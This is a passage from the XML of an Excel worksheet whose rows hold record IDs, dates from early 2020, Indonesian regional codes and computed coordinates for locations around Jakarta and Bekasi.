        <v>2329</v>
      </c>
      <c r="G530" t="s">
        <v>2330</v>
      </c>
      <c r="H530" t="s">
        <v>26</v>
      </c>
      <c r="I530" t="s">
        <v>166</v>
      </c>
      <c r="J530" t="s">
        <v>2331</v>
      </c>
      <c r="L530" t="s">
        <v>2332</v>
      </c>
      <c r="M530">
        <v>3173050003</v>
      </c>
      <c r="N530">
        <v>3173050</v>
      </c>
      <c r="O530">
        <v>3173</v>
      </c>
      <c r="P530">
        <v>31</v>
      </c>
      <c r="Q530" t="s">
        <v>2333</v>
      </c>
      <c r="R530" t="s">
        <v>589</v>
      </c>
      <c r="S530" t="s">
        <v>62</v>
      </c>
      <c r="T530" t="s">
        <v>33</v>
      </c>
      <c r="U530" s="5">
        <v>10686469</v>
      </c>
      <c r="V530" s="5" t="s">
        <v>14943</v>
      </c>
      <c r="W530" s="5">
        <v>-617916</v>
      </c>
      <c r="X530" t="s">
        <v>18750</v>
      </c>
      <c r="Y530" t="str">
        <f t="shared" si="8"/>
        <v>-6.17916,106.86469</v>
      </c>
    </row>
    <row r="531" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A531">
        <v>102254</v>
      </c>
      <c r="B531" s="1">
        <v>43868</v>
      </c>
      <c r="C531">
        <v>1</v>
      </c>
      <c r="D531" t="s">
        <v>22</v>
      </c>
      <c r="E531" t="s">
        <v>23</v>
      </c>
      <c r="F531" t="s">
        <v>2334</v>
      </c>
      <c r="G531" t="s">
        <v>2335</v>
      </c>
      <c r="H531" t="s">
        <v>26</v>
      </c>
      <c r="I531" t="s">
        <v>473</v>
      </c>
      <c r="J531" t="s">
        <v>2336</v>
      </c>
      <c r="L531" t="s">
        <v>2337</v>
      </c>
      <c r="M531">
        <v>3173010003</v>
      </c>
      <c r="N531">
        <v>3173010</v>
      </c>
      <c r="O531">
        <v>3173</v>
      </c>
      <c r="P531">
        <v>31</v>
      </c>
      <c r="Q531" t="s">
        <v>2338</v>
      </c>
      <c r="R531" t="s">
        <v>1481</v>
      </c>
      <c r="S531" t="s">
        <v>62</v>
      </c>
      <c r="T531" t="s">
        <v>33</v>
      </c>
      <c r="U531" s="5">
        <v>10680992</v>
      </c>
      <c r="V531" s="5" t="s">
        <v>14944</v>
      </c>
      <c r="W531" s="5">
        <v>-620513</v>
      </c>
      <c r="X531" t="s">
        <v>18751</v>
      </c>
      <c r="Y531" t="str">
        <f t="shared" si="8"/>
        <v>-6.20513,106.80992</v>
      </c>
    </row>
    <row r="532" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A532">
        <v>102255</v>
      </c>
      <c r="B532" s="1">
        <v>43868</v>
      </c>
      <c r="C532">
        <v>1</v>
      </c>
      <c r="D532" t="s">
        <v>22</v>
      </c>
      <c r="E532" t="s">
        <v>23</v>
      </c>
      <c r="F532" t="s">
        <v>2339</v>
      </c>
      <c r="G532" t="s">
        <v>2340</v>
      </c>
      <c r="H532" t="s">
        <v>26</v>
      </c>
      <c r="I532" t="s">
        <v>882</v>
      </c>
      <c r="J532" t="s">
        <v>2341</v>
      </c>
      <c r="M532">
        <v>3172070006</v>
      </c>
      <c r="N532">
        <v>3172070</v>
      </c>
      <c r="O532">
        <v>3172</v>
      </c>
      <c r="P532">
        <v>31</v>
      </c>
      <c r="Q532" t="s">
        <v>2342</v>
      </c>
      <c r="R532" t="s">
        <v>128</v>
      </c>
      <c r="S532" t="s">
        <v>49</v>
      </c>
      <c r="T532" t="s">
        <v>33</v>
      </c>
      <c r="U532" s="5">
        <v>10692940</v>
      </c>
      <c r="V532" s="5" t="s">
        <v>14945</v>
      </c>
      <c r="W532" s="5">
        <v>-623158</v>
      </c>
      <c r="X532" t="s">
        <v>18752</v>
      </c>
      <c r="Y532" t="str">
        <f t="shared" si="8"/>
        <v>-6.23158,106.92940</v>
      </c>
    </row>
    <row r="533" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A533">
        <v>102256</v>
      </c>
      <c r="B533" s="1">
        <v>43868</v>
      </c>
      <c r="C533">
        <v>1</v>
      </c>
      <c r="D533" t="s">
        <v>22</v>
      </c>
      <c r="E533" t="s">
        <v>23</v>
      </c>
      <c r="F533" t="s">
        <v>2343</v>
      </c>
      <c r="G533" t="s">
        <v>2344</v>
      </c>
      <c r="H533" t="s">
        <v>26</v>
      </c>
      <c r="I533" t="s">
        <v>27</v>
      </c>
      <c r="J533" t="s">
        <v>37</v>
      </c>
      <c r="L533" t="s">
        <v>2345</v>
      </c>
      <c r="M533">
        <v>3671030016</v>
      </c>
      <c r="N533">
        <v>3671030</v>
      </c>
      <c r="O533">
        <v>3671</v>
      </c>
      <c r="P533">
        <v>36</v>
      </c>
      <c r="Q533" t="s">
        <v>2346</v>
      </c>
      <c r="R533" t="s">
        <v>201</v>
      </c>
      <c r="S533" t="s">
        <v>201</v>
      </c>
      <c r="T533" t="s">
        <v>171</v>
      </c>
      <c r="U533" s="5">
        <v>10665004</v>
      </c>
      <c r="V533" s="5" t="s">
        <v>14946</v>
      </c>
      <c r="W533" s="5">
        <v>-616768</v>
      </c>
      <c r="X533" t="s">
        <v>18753</v>
      </c>
      <c r="Y533" t="str">
        <f t="shared" si="8"/>
        <v>-6.16768,106.65004</v>
      </c>
    </row>
    <row r="534" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A534">
        <v>102257</v>
      </c>
      <c r="B534" s="1">
        <v>43868</v>
      </c>
      <c r="C534">
        <v>1</v>
      </c>
      <c r="D534" t="s">
        <v>22</v>
      </c>
      <c r="E534" t="s">
        <v>23</v>
      </c>
      <c r="F534" t="s">
        <v>2347</v>
      </c>
      <c r="G534" t="s">
        <v>2348</v>
      </c>
      <c r="H534" t="s">
        <v>26</v>
      </c>
      <c r="I534" t="s">
        <v>1542</v>
      </c>
      <c r="J534" t="s">
        <v>1995</v>
      </c>
      <c r="L534" t="s">
        <v>2349</v>
      </c>
      <c r="M534">
        <v>3175030001</v>
      </c>
      <c r="N534">
        <v>3175030</v>
      </c>
      <c r="O534">
        <v>3175</v>
      </c>
      <c r="P534">
        <v>31</v>
      </c>
      <c r="Q534" t="s">
        <v>1574</v>
      </c>
      <c r="R534" t="s">
        <v>1563</v>
      </c>
      <c r="S534" t="s">
        <v>547</v>
      </c>
      <c r="T534" t="s">
        <v>33</v>
      </c>
      <c r="U534" s="5">
        <v>10687017</v>
      </c>
      <c r="V534" s="5" t="s">
        <v>14947</v>
      </c>
      <c r="W534" s="5">
        <v>-613984</v>
      </c>
      <c r="X534" t="s">
        <v>18754</v>
      </c>
      <c r="Y534" t="str">
        <f t="shared" si="8"/>
        <v>-6.13984,106.87017</v>
      </c>
    </row>
    <row r="535" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A535">
        <v>102258</v>
      </c>
      <c r="B535" s="1">
        <v>43868</v>
      </c>
      <c r="C535">
        <v>1</v>
      </c>
      <c r="D535" t="s">
        <v>22</v>
      </c>
      <c r="E535" t="s">
        <v>23</v>
      </c>
      <c r="F535" t="s">
        <v>2350</v>
      </c>
      <c r="G535" t="s">
        <v>2351</v>
      </c>
      <c r="H535" t="s">
        <v>26</v>
      </c>
      <c r="I535" t="s">
        <v>1559</v>
      </c>
      <c r="J535" t="s">
        <v>2352</v>
      </c>
      <c r="L535" t="s">
        <v>2353</v>
      </c>
      <c r="M535">
        <v>3173050002</v>
      </c>
      <c r="N535">
        <v>3173050</v>
      </c>
      <c r="O535">
        <v>3173</v>
      </c>
      <c r="P535">
        <v>31</v>
      </c>
      <c r="Q535" t="s">
        <v>588</v>
      </c>
      <c r="R535" t="s">
        <v>589</v>
      </c>
      <c r="S535" t="s">
        <v>62</v>
      </c>
      <c r="T535" t="s">
        <v>33</v>
      </c>
      <c r="U535" s="5">
        <v>10687423</v>
      </c>
      <c r="V535" s="5" t="s">
        <v>14948</v>
      </c>
      <c r="W535" s="5">
        <v>-617533</v>
      </c>
      <c r="X535" t="s">
        <v>18755</v>
      </c>
      <c r="Y535" t="str">
        <f t="shared" si="8"/>
        <v>-6.17533,106.87423</v>
      </c>
    </row>
    <row r="536" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A536">
        <v>102259</v>
      </c>
      <c r="B536" s="1">
        <v>43869</v>
      </c>
      <c r="C536">
        <v>0</v>
      </c>
      <c r="D536" t="s">
        <v>22</v>
      </c>
      <c r="E536" t="s">
        <v>23</v>
      </c>
      <c r="F536" t="s">
        <v>2354</v>
      </c>
      <c r="G536" t="s">
        <v>2355</v>
      </c>
      <c r="H536" t="s">
        <v>26</v>
      </c>
      <c r="I536" t="s">
        <v>1710</v>
      </c>
      <c r="J536" t="s">
        <v>2356</v>
      </c>
      <c r="L536" t="s">
        <v>2357</v>
      </c>
      <c r="M536">
        <v>3173050002</v>
      </c>
      <c r="N536">
        <v>3173050</v>
      </c>
      <c r="O536">
        <v>3173</v>
      </c>
      <c r="P536">
        <v>31</v>
      </c>
      <c r="Q536" t="s">
        <v>588</v>
      </c>
      <c r="R536" t="s">
        <v>589</v>
      </c>
      <c r="S536" t="s">
        <v>62</v>
      </c>
      <c r="T536" t="s">
        <v>33</v>
      </c>
      <c r="U536" s="5">
        <v>10686662</v>
      </c>
      <c r="V536" s="5" t="s">
        <v>14949</v>
      </c>
      <c r="W536" s="5">
        <v>-617256</v>
      </c>
      <c r="X536" t="s">
        <v>18756</v>
      </c>
      <c r="Y536" t="str">
        <f t="shared" si="8"/>
        <v>-6.17256,106.86662</v>
      </c>
    </row>
    <row r="537" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A537">
        <v>102260</v>
      </c>
      <c r="B537" s="1">
        <v>43869</v>
      </c>
      <c r="C537">
        <v>0</v>
      </c>
      <c r="D537" t="s">
        <v>22</v>
      </c>
      <c r="E537" t="s">
        <v>23</v>
      </c>
      <c r="F537" t="s">
        <v>2358</v>
      </c>
      <c r="G537" t="s">
        <v>2359</v>
      </c>
      <c r="H537" t="s">
        <v>26</v>
      </c>
      <c r="I537" t="s">
        <v>166</v>
      </c>
      <c r="J537" t="s">
        <v>2356</v>
      </c>
      <c r="L537" t="s">
        <v>2360</v>
      </c>
      <c r="M537">
        <v>3173050002</v>
      </c>
      <c r="N537">
        <v>3173050</v>
      </c>
      <c r="O537">
        <v>3173</v>
      </c>
      <c r="P537">
        <v>31</v>
      </c>
      <c r="Q537" t="s">
        <v>588</v>
      </c>
      <c r="R537" t="s">
        <v>589</v>
      </c>
      <c r="S537" t="s">
        <v>62</v>
      </c>
      <c r="T537" t="s">
        <v>33</v>
      </c>
      <c r="U537" s="5">
        <v>10686678</v>
      </c>
      <c r="V537" s="5" t="s">
        <v>14950</v>
      </c>
      <c r="W537" s="5">
        <v>-617295</v>
      </c>
      <c r="X537" t="s">
        <v>18757</v>
      </c>
      <c r="Y537" t="str">
        <f t="shared" si="8"/>
        <v>-6.17295,106.86678</v>
      </c>
    </row>
    <row r="538" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A538">
        <v>102261</v>
      </c>
      <c r="B538" s="1">
        <v>43869</v>
      </c>
      <c r="C538">
        <v>0</v>
      </c>
      <c r="D538" t="s">
        <v>22</v>
      </c>
      <c r="E538" t="s">
        <v>23</v>
      </c>
      <c r="F538" t="s">
        <v>2361</v>
      </c>
      <c r="H538" t="s">
        <v>26</v>
      </c>
      <c r="I538" t="s">
        <v>974</v>
      </c>
      <c r="J538" t="s">
        <v>2362</v>
      </c>
      <c r="L538" t="s">
        <v>2363</v>
      </c>
      <c r="M538">
        <v>3175050003</v>
      </c>
      <c r="N538">
        <v>3175050</v>
      </c>
      <c r="O538">
        <v>3175</v>
      </c>
      <c r="P538">
        <v>31</v>
      </c>
      <c r="Q538" t="s">
        <v>1740</v>
      </c>
      <c r="R538" t="s">
        <v>1013</v>
      </c>
      <c r="S538" t="s">
        <v>547</v>
      </c>
      <c r="T538" t="s">
        <v>33</v>
      </c>
      <c r="U538" s="5">
        <v>10691162</v>
      </c>
      <c r="V538" s="5" t="s">
        <v>14951</v>
      </c>
      <c r="W538" s="5">
        <v>-616998</v>
      </c>
      <c r="X538" t="s">
        <v>18758</v>
      </c>
      <c r="Y538" t="str">
        <f t="shared" si="8"/>
        <v>-6.16998,106.91162</v>
      </c>
    </row>
    <row r="539" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A539">
        <v>102262</v>
      </c>
      <c r="B539" s="1">
        <v>43869</v>
      </c>
      <c r="C539">
        <v>0</v>
      </c>
      <c r="D539" t="s">
        <v>22</v>
      </c>
      <c r="E539" t="s">
        <v>23</v>
      </c>
      <c r="F539" t="s">
        <v>2364</v>
      </c>
      <c r="H539" t="s">
        <v>26</v>
      </c>
      <c r="I539" t="s">
        <v>1359</v>
      </c>
      <c r="J539" t="s">
        <v>2365</v>
      </c>
      <c r="L539" t="s">
        <v>2366</v>
      </c>
      <c r="M539">
        <v>3175050003</v>
      </c>
      <c r="N539">
        <v>3175050</v>
      </c>
      <c r="O539">
        <v>3175</v>
      </c>
      <c r="P539">
        <v>31</v>
      </c>
      <c r="Q539" t="s">
        <v>1740</v>
      </c>
      <c r="R539" t="s">
        <v>1013</v>
      </c>
      <c r="S539" t="s">
        <v>547</v>
      </c>
      <c r="T539" t="s">
        <v>33</v>
      </c>
      <c r="U539" s="5">
        <v>10691157</v>
      </c>
      <c r="V539" s="5" t="s">
        <v>14952</v>
      </c>
      <c r="W539" s="5">
        <v>-615223</v>
      </c>
      <c r="X539" t="s">
        <v>18759</v>
      </c>
      <c r="Y539" t="str">
        <f t="shared" si="8"/>
        <v>-6.15223,106.91157</v>
      </c>
    </row>
    <row r="540" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A540">
        <v>102263</v>
      </c>
      <c r="B540" s="1">
        <v>43869</v>
      </c>
      <c r="C540">
        <v>0</v>
      </c>
      <c r="D540" t="s">
        <v>22</v>
      </c>
      <c r="E540" t="s">
        <v>23</v>
      </c>
      <c r="F540" t="s">
        <v>2367</v>
      </c>
      <c r="G540" t="s">
        <v>2368</v>
      </c>
      <c r="H540" t="s">
        <v>26</v>
      </c>
      <c r="I540" t="s">
        <v>1194</v>
      </c>
      <c r="J540" t="s">
        <v>2369</v>
      </c>
      <c r="L540" t="s">
        <v>2370</v>
      </c>
      <c r="M540">
        <v>3175050001</v>
      </c>
      <c r="N540">
        <v>3175050</v>
      </c>
      <c r="O540">
        <v>3175</v>
      </c>
      <c r="P540">
        <v>31</v>
      </c>
      <c r="Q540" t="s">
        <v>1037</v>
      </c>
      <c r="R540" t="s">
        <v>1013</v>
      </c>
      <c r="S540" t="s">
        <v>547</v>
      </c>
      <c r="T540" t="s">
        <v>33</v>
      </c>
      <c r="U540" s="5">
        <v>10688800</v>
      </c>
      <c r="V540" s="5" t="s">
        <v>14953</v>
      </c>
      <c r="W540" s="5">
        <v>-616041</v>
      </c>
      <c r="X540" t="s">
        <v>18760</v>
      </c>
      <c r="Y540" t="str">
        <f t="shared" si="8"/>
        <v>-6.16041,106.88800</v>
      </c>
    </row>
    <row r="541" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A541">
        <v>102264</v>
      </c>
      <c r="B541" s="1">
        <v>43869</v>
      </c>
      <c r="C541">
        <v>0</v>
      </c>
      <c r="D541" t="s">
        <v>22</v>
      </c>
      <c r="E541" t="s">
        <v>23</v>
      </c>
      <c r="F541" t="s">
        <v>2371</v>
      </c>
      <c r="G541" t="s">
        <v>2372</v>
      </c>
      <c r="H541" t="s">
        <v>26</v>
      </c>
      <c r="I541" t="s">
        <v>2139</v>
      </c>
      <c r="J541" t="s">
        <v>1788</v>
      </c>
      <c r="L541" t="s">
        <v>2373</v>
      </c>
      <c r="M541">
        <v>3175050003</v>
      </c>
      <c r="N541">
        <v>3175050</v>
      </c>
      <c r="O541">
        <v>3175</v>
      </c>
      <c r="P541">
        <v>31</v>
      </c>
      <c r="Q541" t="s">
        <v>1740</v>
      </c>
      <c r="R541" t="s">
        <v>1013</v>
      </c>
      <c r="S541" t="s">
        <v>547</v>
      </c>
      <c r="T541" t="s">
        <v>33</v>
      </c>
      <c r="U541" s="5">
        <v>10691041</v>
      </c>
      <c r="V541" s="5" t="s">
        <v>14954</v>
      </c>
      <c r="W541" s="5">
        <v>-615373</v>
      </c>
      <c r="X541" t="s">
        <v>18761</v>
      </c>
      <c r="Y541" t="str">
        <f t="shared" si="8"/>
        <v>-6.15373,106.91041</v>
      </c>
    </row>
    <row r="542" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A542">
        <v>102265</v>
      </c>
      <c r="B542" s="1">
        <v>43869</v>
      </c>
      <c r="C542">
        <v>0</v>
      </c>
      <c r="D542" t="s">
        <v>22</v>
      </c>
      <c r="E542" t="s">
        <v>23</v>
      </c>
      <c r="F542" t="s">
        <v>2374</v>
      </c>
      <c r="H542" t="s">
        <v>26</v>
      </c>
      <c r="I542" t="s">
        <v>27</v>
      </c>
      <c r="J542" t="s">
        <v>2375</v>
      </c>
      <c r="L542" t="s">
        <v>2376</v>
      </c>
      <c r="M542">
        <v>3175030001</v>
      </c>
      <c r="N542">
        <v>3175030</v>
      </c>
      <c r="O542">
        <v>3175</v>
      </c>
      <c r="P542">
        <v>31</v>
      </c>
      <c r="Q542" t="s">
        <v>1574</v>
      </c>
      <c r="R542" t="s">
        <v>1563</v>
      </c>
      <c r="S542" t="s">
        <v>547</v>
      </c>
      <c r="T542" t="s">
        <v>33</v>
      </c>
      <c r="U542" s="5">
        <v>10687121</v>
      </c>
      <c r="V542" s="5" t="s">
        <v>14955</v>
      </c>
      <c r="W542" s="5">
        <v>-613671</v>
      </c>
      <c r="X542" t="s">
        <v>18762</v>
      </c>
      <c r="Y542" t="str">
        <f t="shared" si="8"/>
        <v>-6.13671,106.87121</v>
      </c>
    </row>
    <row r="543" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A543">
        <v>102266</v>
      </c>
      <c r="B543" s="1">
        <v>43869</v>
      </c>
      <c r="C543">
        <v>0</v>
      </c>
      <c r="D543" t="s">
        <v>22</v>
      </c>
      <c r="E543" t="s">
        <v>23</v>
      </c>
      <c r="F543" t="s">
        <v>2377</v>
      </c>
      <c r="G543" t="s">
        <v>2378</v>
      </c>
      <c r="H543" t="s">
        <v>26</v>
      </c>
      <c r="I543" t="s">
        <v>271</v>
      </c>
      <c r="J543" t="s">
        <v>1590</v>
      </c>
      <c r="L543" t="s">
        <v>2379</v>
      </c>
      <c r="M543">
        <v>3175030002</v>
      </c>
      <c r="N543">
        <v>3175030</v>
      </c>
      <c r="O543">
        <v>3175</v>
      </c>
      <c r="P543">
        <v>31</v>
      </c>
      <c r="Q543" t="s">
        <v>1592</v>
      </c>
      <c r="R543" t="s">
        <v>1563</v>
      </c>
      <c r="S543" t="s">
        <v>547</v>
      </c>
      <c r="T543" t="s">
        <v>33</v>
      </c>
      <c r="U543" s="5">
        <v>10688617</v>
      </c>
      <c r="V543" s="5" t="s">
        <v>14956</v>
      </c>
      <c r="W543" s="5">
        <v>-614984</v>
      </c>
      <c r="X543" t="s">
        <v>18327</v>
      </c>
      <c r="Y543" t="str">
        <f t="shared" si="8"/>
        <v>-6.14984,106.88617</v>
      </c>
    </row>
    <row r="544" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A544">
        <v>102267</v>
      </c>
      <c r="B544" s="1">
        <v>43869</v>
      </c>
      <c r="C544">
        <v>0</v>
      </c>
      <c r="D544" t="s">
        <v>22</v>
      </c>
      <c r="E544" t="s">
        <v>23</v>
      </c>
      <c r="F544" t="s">
        <v>2380</v>
      </c>
      <c r="G544" t="s">
        <v>2381</v>
      </c>
      <c r="H544" t="s">
        <v>26</v>
      </c>
      <c r="I544" t="s">
        <v>2002</v>
      </c>
      <c r="J544" t="s">
        <v>37</v>
      </c>
      <c r="M544">
        <v>3201190010</v>
      </c>
      <c r="N544">
        <v>3201190</v>
      </c>
      <c r="O544">
        <v>3201</v>
      </c>
      <c r="P544">
        <v>32</v>
      </c>
      <c r="Q544" t="s">
        <v>419</v>
      </c>
      <c r="R544" t="s">
        <v>420</v>
      </c>
      <c r="S544" t="s">
        <v>421</v>
      </c>
      <c r="T544" t="s">
        <v>42</v>
      </c>
      <c r="U544" s="5">
        <v>10696229</v>
      </c>
      <c r="V544" s="5" t="s">
        <v>14957</v>
      </c>
      <c r="W544" s="5">
        <v>-633482</v>
      </c>
      <c r="X544" t="s">
        <v>18763</v>
      </c>
      <c r="Y544" t="str">
        <f t="shared" si="8"/>
        <v>-6.33482,106.96229</v>
      </c>
    </row>
    <row r="545" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A545">
        <v>102268</v>
      </c>
      <c r="B545" s="1">
        <v>43869</v>
      </c>
      <c r="C545">
        <v>0</v>
      </c>
      <c r="D545" t="s">
        <v>22</v>
      </c>
      <c r="E545" t="s">
        <v>23</v>
      </c>
      <c r="F545" t="s">
        <v>2382</v>
      </c>
      <c r="G545" t="s">
        <v>2383</v>
      </c>
      <c r="H545" t="s">
        <v>26</v>
      </c>
      <c r="I545" t="s">
        <v>1201</v>
      </c>
      <c r="J545" t="s">
        <v>2384</v>
      </c>
      <c r="L545" t="s">
        <v>2385</v>
      </c>
      <c r="M545">
        <v>3172090006</v>
      </c>
      <c r="N545">
        <v>3172090</v>
      </c>
      <c r="O545">
        <v>3172</v>
      </c>
      <c r="P545">
        <v>31</v>
      </c>
      <c r="Q545" t="s">
        <v>2283</v>
      </c>
      <c r="R545" t="s">
        <v>890</v>
      </c>
      <c r="S545" t="s">
        <v>49</v>
      </c>
      <c r="T545" t="s">
        <v>33</v>
      </c>
      <c r="U545" s="5">
        <v>10688440</v>
      </c>
      <c r="V545" s="5" t="s">
        <v>14958</v>
      </c>
      <c r="W545" s="5">
        <v>-618069</v>
      </c>
      <c r="X545" t="s">
        <v>18764</v>
      </c>
      <c r="Y545" t="str">
        <f t="shared" si="8"/>
        <v>-6.18069,106.88440</v>
      </c>
    </row>
    <row r="546" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A546">
        <v>102269</v>
      </c>
      <c r="B546" s="1">
        <v>43869</v>
      </c>
      <c r="C546">
        <v>0</v>
      </c>
      <c r="D546" t="s">
        <v>22</v>
      </c>
      <c r="E546" t="s">
        <v>23</v>
      </c>
      <c r="F546" t="s">
        <v>2386</v>
      </c>
      <c r="G546" t="s">
        <v>2387</v>
      </c>
      <c r="H546" t="s">
        <v>26</v>
      </c>
      <c r="I546" t="s">
        <v>166</v>
      </c>
      <c r="J546" t="s">
        <v>37</v>
      </c>
      <c r="L546" t="s">
        <v>2388</v>
      </c>
      <c r="M546">
        <v>3275010011</v>
      </c>
      <c r="N546">
        <v>3275010</v>
      </c>
      <c r="O546">
        <v>3275</v>
      </c>
      <c r="P546">
        <v>32</v>
      </c>
      <c r="Q546" t="s">
        <v>2389</v>
      </c>
      <c r="R546" t="s">
        <v>287</v>
      </c>
      <c r="S546" t="s">
        <v>41</v>
      </c>
      <c r="T546" t="s">
        <v>42</v>
      </c>
      <c r="U546" s="5">
        <v>10692176</v>
      </c>
      <c r="V546" s="5" t="s">
        <v>14959</v>
      </c>
      <c r="W546" s="5">
        <v>-626388</v>
      </c>
      <c r="X546" t="s">
        <v>18765</v>
      </c>
      <c r="Y546" t="str">
        <f t="shared" si="8"/>
        <v>-6.26388,106.92176</v>
      </c>
    </row>
    <row r="547" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A547">
        <v>102270</v>
      </c>
      <c r="B547" s="1">
        <v>43869</v>
      </c>
      <c r="C547">
        <v>0</v>
      </c>
      <c r="D547" t="s">
        <v>22</v>
      </c>
      <c r="E547" t="s">
        <v>23</v>
      </c>
      <c r="F547" t="s">
        <v>2390</v>
      </c>
      <c r="G547" t="s">
        <v>2391</v>
      </c>
      <c r="H547" t="s">
        <v>26</v>
      </c>
      <c r="I547" t="s">
        <v>27</v>
      </c>
      <c r="J547" t="s">
        <v>2392</v>
      </c>
      <c r="L547" t="s">
        <v>2393</v>
      </c>
      <c r="M547">
        <v>3175050002</v>
      </c>
      <c r="N547">
        <v>3175050</v>
      </c>
      <c r="O547">
        <v>3175</v>
      </c>
      <c r="P547">
        <v>31</v>
      </c>
      <c r="Q547" t="s">
        <v>1012</v>
      </c>
      <c r="R547" t="s">
        <v>1013</v>
      </c>
      <c r="S547" t="s">
        <v>547</v>
      </c>
      <c r="T547" t="s">
        <v>33</v>
      </c>
      <c r="U547" s="5">
        <v>10690721</v>
      </c>
      <c r="V547" s="5" t="s">
        <v>14960</v>
      </c>
      <c r="W547" s="5">
        <v>-615339</v>
      </c>
      <c r="X547" t="s">
        <v>18766</v>
      </c>
      <c r="Y547" t="str">
        <f t="shared" si="8"/>
        <v>-6.15339,106.90721</v>
      </c>
    </row>
    <row r="548" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A548">
        <v>102271</v>
      </c>
      <c r="B548" s="1">
        <v>43869</v>
      </c>
      <c r="C548">
        <v>0</v>
      </c>
      <c r="D548" t="s">
        <v>22</v>
      </c>
      <c r="E548" t="s">
        <v>23</v>
      </c>
      <c r="F548" t="s">
        <v>2394</v>
      </c>
      <c r="H548" t="s">
        <v>26</v>
      </c>
      <c r="I548" t="s">
        <v>2395</v>
      </c>
      <c r="J548" t="s">
        <v>1519</v>
      </c>
      <c r="L548" t="s">
        <v>2396</v>
      </c>
      <c r="M548">
        <v>3175010003</v>
      </c>
      <c r="N548">
        <v>3175010</v>
      </c>
      <c r="O548">
        <v>3175</v>
      </c>
      <c r="P548">
        <v>31</v>
      </c>
      <c r="Q548" t="s">
        <v>545</v>
      </c>
      <c r="R548" t="s">
        <v>546</v>
      </c>
      <c r="S548" t="s">
        <v>547</v>
      </c>
      <c r="T548" t="s">
        <v>33</v>
      </c>
      <c r="U548" s="5">
        <v>10677685</v>
      </c>
      <c r="V548" s="5" t="s">
        <v>14961</v>
      </c>
      <c r="W548" s="5">
        <v>-614211</v>
      </c>
      <c r="X548" t="s">
        <v>18767</v>
      </c>
      <c r="Y548" t="str">
        <f t="shared" si="8"/>
        <v>-6.14211,106.77685</v>
      </c>
    </row>
    <row r="549" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A549">
        <v>102272</v>
      </c>
      <c r="B549" s="1">
        <v>43869</v>
      </c>
      <c r="C549">
        <v>0</v>
      </c>
      <c r="D549" t="s">
        <v>22</v>
      </c>
      <c r="E549" t="s">
        <v>23</v>
      </c>
      <c r="F549" t="s">
        <v>2397</v>
      </c>
      <c r="G549" t="s">
        <v>2398</v>
      </c>
      <c r="H549" t="s">
        <v>26</v>
      </c>
      <c r="I549" t="s">
        <v>1009</v>
      </c>
      <c r="J549" t="s">
        <v>37</v>
      </c>
      <c r="L549" t="s">
        <v>2399</v>
      </c>
      <c r="M549">
        <v>3275010012</v>
      </c>
      <c r="N549">
        <v>3275010</v>
      </c>
      <c r="O549">
        <v>3275</v>
      </c>
      <c r="P549">
        <v>32</v>
      </c>
      <c r="Q549" t="s">
        <v>2322</v>
      </c>
      <c r="R549" t="s">
        <v>287</v>
      </c>
      <c r="S549" t="s">
        <v>41</v>
      </c>
      <c r="T549" t="s">
        <v>42</v>
      </c>
      <c r="U549" s="5">
        <v>10692803</v>
      </c>
      <c r="V549" s="5" t="s">
        <v>14962</v>
      </c>
      <c r="W549" s="5">
        <v>-626494</v>
      </c>
      <c r="X549" t="s">
        <v>18768</v>
      </c>
      <c r="Y549" t="str">
        <f t="shared" si="8"/>
        <v>-6.26494,106.92803</v>
      </c>
    </row>
    <row r="550" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A550">
        <v>102273</v>
      </c>
      <c r="B550" s="1">
        <v>43869</v>
      </c>
      <c r="C550">
        <v>0</v>
      </c>
      <c r="D550" t="s">
        <v>22</v>
      </c>
      <c r="E550" t="s">
        <v>23</v>
      </c>
      <c r="F550" t="s">
        <v>2400</v>
      </c>
      <c r="G550" t="s">
        <v>2401</v>
      </c>
      <c r="H550" t="s">
        <v>26</v>
      </c>
      <c r="I550" t="s">
        <v>65</v>
      </c>
      <c r="J550" t="s">
        <v>2331</v>
      </c>
      <c r="L550" t="s">
        <v>2402</v>
      </c>
      <c r="M550">
        <v>3173050003</v>
      </c>
      <c r="N550">
        <v>3173050</v>
      </c>
      <c r="O550">
        <v>3173</v>
      </c>
      <c r="P550">
        <v>31</v>
      </c>
      <c r="Q550" t="s">
        <v>2333</v>
      </c>
      <c r="R550" t="s">
        <v>589</v>
      </c>
      <c r="S550" t="s">
        <v>62</v>
      </c>
      <c r="T550" t="s">
        <v>33</v>
      </c>
      <c r="U550" s="5">
        <v>10686677</v>
      </c>
      <c r="V550" s="5" t="s">
        <v>14963</v>
      </c>
      <c r="W550" s="5">
        <v>-618001</v>
      </c>
      <c r="X550" t="s">
        <v>18769</v>
      </c>
      <c r="Y550" t="str">
        <f t="shared" si="8"/>
        <v>-6.18001,106.86677</v>
      </c>
    </row>
    <row r="551" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A551">
        <v>102274</v>
      </c>
      <c r="B551" s="1">
        <v>43869</v>
      </c>
      <c r="C551">
        <v>0</v>
      </c>
      <c r="D551" t="s">
        <v>22</v>
      </c>
      <c r="E551" t="s">
        <v>23</v>
      </c>
      <c r="F551" t="s">
        <v>2403</v>
      </c>
      <c r="G551" t="s">
        <v>2404</v>
      </c>
      <c r="H551" t="s">
        <v>26</v>
      </c>
      <c r="I551" t="s">
        <v>1046</v>
      </c>
      <c r="J551" t="s">
        <v>37</v>
      </c>
      <c r="L551" t="s">
        <v>2405</v>
      </c>
      <c r="M551">
        <v>3275010011</v>
      </c>
      <c r="N551">
        <v>3275010</v>
      </c>
      <c r="O551">
        <v>3275</v>
      </c>
      <c r="P551">
        <v>32</v>
      </c>
      <c r="Q551" t="s">
        <v>2389</v>
      </c>
